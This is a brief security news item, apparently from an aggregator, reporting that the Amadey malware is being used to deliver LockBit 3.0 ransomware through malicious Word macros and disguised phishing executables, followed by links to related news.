Security News > 2022 > November > Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines
The Amadey malware is being used to deploy LockBit 3.0 ransomware on compromised systems, researchers have warned.
The document contains a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.
In an alternative attack chain, Amadey is disguised as a seemingly harmless file bearing a Word icon but is actually an executable that's propagated via a phishing message.
Succeeding in the execution of Amadey, the malware fetches and launches additional commands from a remote server, which includes the LockBit ransomware either in PowerShell or binary formats.
LockBit 3.0, also known as LockBit Black, launched in June 2022, alongside a new dark web portal and the very first bug bounty program for a ransomware operation, promising rewards of up to $1 million for finding bugs in its website and software.
"As LockBit ransomware is being distributed through various methods, user caution is advised," the researchers concluded.
News URL
https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html
Related news
- Police arrest four suspects linked to LockBit ransomware gang (source)
- LockBit Ransomware and Evil Corp Members Arrested and Sanctioned in Joint Global Effort (source)
- Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (source)
- Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks (source)